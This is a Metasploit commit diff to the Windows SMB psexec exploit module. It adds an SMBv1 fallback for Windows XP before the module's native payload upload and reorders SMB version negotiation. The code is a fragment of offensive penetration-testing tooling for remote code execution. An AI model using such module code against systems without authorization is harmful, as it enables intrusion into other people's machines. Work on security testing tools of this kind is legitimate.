Land #10242, avoid using SMBv2 on Windows XP Native Upload targets

2018-07-02 17:34:53 -05:00 · 2018-07-02 17:34:53 -05:00 · d9ed8352ab
parent 0543dfc95c 5946245d87
commit d9ed8352ab
1 changed files with 14 additions and 4 deletions
--- a/modules/exploits/windows/smb/psexec.rb
+++ b/modules/exploits/windows/smb/psexec.rb
@ -86,12 +86,22 @@ class MetasploitModule < Msf::Exploit::Remote
      ])
  end

+  def native_upload_with_workaround
+    # Avoid implementing NTLMSSP on Windows XP
+    # http://seclists.org/metasploit/2009/q1/6
+    if smb_peer_os == "Windows 5.1"
+      connect(versions: [1])
+      smb_login
+    end
+    native_upload(datastore['SHARE'])
+  end
+
  def exploit
    print_status("Connecting to the server...")
-    connect(versions: [1,2])
+    connect(versions: [2,1])

    print_status("Authenticating to #{smbhost} as user '#{splitname(datastore['SMBUser'])}'...")
-    smb_login()
+    smb_login

    if not simple.client.auth_user and not datastore['ALLOW_GUEST']
      print_line(" ")
@ -117,12 +127,12 @@ class MetasploitModule < Msf::Exploit::Remote
        execute_powershell_payload
      else
        print_status('Selecting native target')
-        native_upload(datastore['SHARE'])
+        native_upload_with_workaround
      end
    when 'PowerShell'
      execute_powershell_payload
    when 'Native upload'
-      native_upload(datastore['SHARE'])
+      native_upload_with_workaround
    when 'MOF upload'
      mof_upload(datastore['SHARE'])
    end